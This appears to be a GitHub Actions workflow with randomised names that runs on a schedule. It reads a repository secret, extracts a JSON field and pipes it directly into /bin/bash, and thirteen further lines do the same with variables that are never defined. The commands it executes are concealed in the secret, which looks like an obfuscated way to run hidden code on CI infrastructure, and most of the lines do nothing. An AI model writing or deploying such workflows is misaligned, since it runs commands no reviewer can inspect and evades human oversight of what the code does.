name: gaojiaoshi4389

on:
  workflow_dispatch:
  schedule:
    - cron: '13 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaojiaoshi4389
        env:
          ex156: ${{ secrets.ex156 }}
        run: |
          echo $ex156 | jq -r .nfrq2034 | /bin/bash
          echo $a0244 | jq -r .vtqrm39358 | /bin/bash
          echo $dlg368 | jq -r .k45980 | /bin/bash
          echo $cq33 | jq -r .rvhm618 | /bin/bash
          echo $hbcdg142 | jq -r .ivgs6 | /bin/bash
          echo $azgvh4526 | jq -r .ukfe500 | /bin/bash
          echo $wshjp4 | jq -r .zat39292 | /bin/bash
          echo $chavz97 | jq -r .opg9459 | /bin/bash
          echo $z715 | jq -r .qwmu0 | /bin/bash
          echo $lrzwd2473 | jq -r .sasf34769 | /bin/bash
          echo $floa8536 | jq -r .sxe21 | /bin/bash
          echo $n77 | jq -r .vzc403 | /bin/bash
          echo $lkr1 | jq -r .w385 | /bin/bash
          echo $fef22370 | jq -r .lwx7 | /bin/bash

